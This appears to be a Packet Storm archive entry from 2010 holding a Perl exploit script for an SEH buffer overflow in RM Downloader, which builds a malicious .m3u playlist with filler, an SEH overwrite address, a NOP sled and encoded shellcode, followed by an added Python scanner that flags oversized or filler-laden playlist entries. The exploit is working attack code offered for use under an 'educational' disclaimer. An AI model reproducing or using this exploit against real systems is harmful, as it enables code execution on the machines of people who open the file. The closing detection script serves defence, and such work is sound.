RM Downloader .m3u Buffer Overflow

2010-01-20T00:00:00
ID PACKETSTORM:85422
Type packetstorm
Reporter Jacky
Modified 2010-01-20T00:00:00

Description

                                        
`#RM Downloader m3u Buffer Overflow (SEH) (Perl Edition)  
#Discovered by ::> Peter Van Eeckhoutte ( VERY BIG GREETZ TO HIM ) ;-)  
#Written by Jacky  
#All Greetz for Peter Van Eeckhoutte and Corelan Team !!!  
#I tried to exploit it by a Direct Ret , but on my system , it doesn't seem that it's a Direct  
#Ret Vulnerability , so i tried by SEH and Voila !  
#THIS EXPLOIT IS FOR EDUCATIONAL PURPOSES ONLY !!!  
#!/usr/bin/perl -w  
my $file="RM.m3u";  
my $junk="A"x35059;  
my $nseh="\xeb\x1e\x90\x90";  
my $seh="\x1F\xEA\x02\x10"; # 0x1002EA1F::> Thanks for Peter who gave me this  
#address and it worked Perfectly ;-)  
#This Address works too ::> 0x01DD1111  
my $nops="\x90"x25;  
my $esp="\xbf\x1b\xaf\xd9\xd2\x2b\xc9\xb1\x24\xdb\xda\xd9\x74\x24\xf4\x5b".  
"\x31\x7b\x0e\x83\xeb\xfc\x03\x60\xa5\x3b\x27\x6a\x51\xff\xc8\x92".  
"\xa2\x8b\x8c\xae\x29\xf7\x0b\xb6\x2c\xe7\x9f\x09\x37\x7c\xc0\xb5".  
"\x46\x69\xb6\x3e\x7c\xe6\x48\xae\x4c\x38\xd3\x82\x2b\x78\x90\xdd".  
"\xf2\xb3\x54\xe0\x36\xa8\x93\xd9\xe2\x0b\x58\x68\xee\xdf\x3f\xb6".  
"\xf1\x34\xd9\x3d\xfd\x81\xad\x1e\xe2\x14\x59\x2b\x06\x9c\x9c\xc0".  
"\xbe\xfe\xba\x12\x02\xcf\x02\x7e\x0f\x70\xb3\xfb\xcf\x09\xbf\x88".  
"\x90\xe5\x34\xfe\x0c\x5b\xc1\x96\x24\x48\xdf\xed\xb5\x3e\xe0\xf1".  
"\xb5\xb5\x89\xcd\xea\xf8\xbf\x4d\x43\x72\xc7\x0e\xab\xff\x68\x78".  
"\xdc\x8a\x8d\x27\x74\x13\x73\x5d\x8a\x74\x73\x86\xf0\x1b\xe7\x2b".  
"\xd9\xbe\x8f\xce\x25";  
  
my $junk2="A"x5000;  
my $payload=$junk.$nseh.$seh.$nops.$esp.$junk2;  
  
  
open(INI,">$file");  
print INI $payload;  
print "[+]File Created Successfully!\n";  
print "[+]Done!\n";  
close(INI);  
  
  
`
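
A defensive triage check for playlist files shaped like the one the script above writes (a single entry of tens of thousands of filler bytes with non-text bytes in the middle). This is an added example, not part of the original post; the thresholds `MAX_ENTRY_LEN` and `MIN_RUN`, the function names and both sample inputs are assumptions constructed for illustration.

```python
import re
import unicodedata

MAX_ENTRY_LEN = 2048   # assumed ceiling for one legitimate path or URL entry
MIN_RUN = 64           # assumed: one byte repeated this often looks like filler
_RUN = re.compile(rb"(.)\1{%d,}" % (MIN_RUN - 1), re.DOTALL)


def _has_control_chars(line: bytes) -> bool:
    """True if the entry contains control characters other than TAB."""
    try:
        text = line.decode("utf-8")
    except UnicodeDecodeError:
        # latin-1 never fails; bytes 0x80-0x9f become C1 control characters.
        # Heuristic: cp1252 names using those bytes will also be flagged.
        text = line.decode("latin-1")
    return any(unicodedata.category(c) == "Cc" and c != "\t" for c in text)


def scan_m3u(data: bytes) -> list:
    """Return [(line_number, [reasons])] for suspicious playlist entries."""
    findings = []
    for number, raw in enumerate(data.split(b"\n"), start=1):
        line = raw.rstrip(b"\r")
        if not line:
            continue
        reasons = []
        if len(line) > MAX_ENTRY_LEN:
            reasons.append("oversized")
        if _has_control_chars(line):
            reasons.append("control-bytes")
        if _RUN.search(line):
            reasons.append("repeated-run")
        if reasons:
            findings.append((number, reasons))
    return findings


# Constructed samples, not real captures. SUSPECT copies only the filler
# lengths and NOP count from the script above; it carries no payload.
BENIGN = (b"#EXTM3U\r\n#EXTINF:123,Artist - Title\r\n"
          b"C:\\Music\\track01.mp3\r\nhttp://example.com/stream.mp3\r\n")
SUSPECT = b"#EXTM3U\r\n" + b"A" * 35059 + b"\x90" * 25 + b"A" * 5000

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, scan_m3u(blob))
```

The same three checks can run at a mail or web gateway before a playlist reaches a vulnerable player; tune the thresholds against real playlists in your environment.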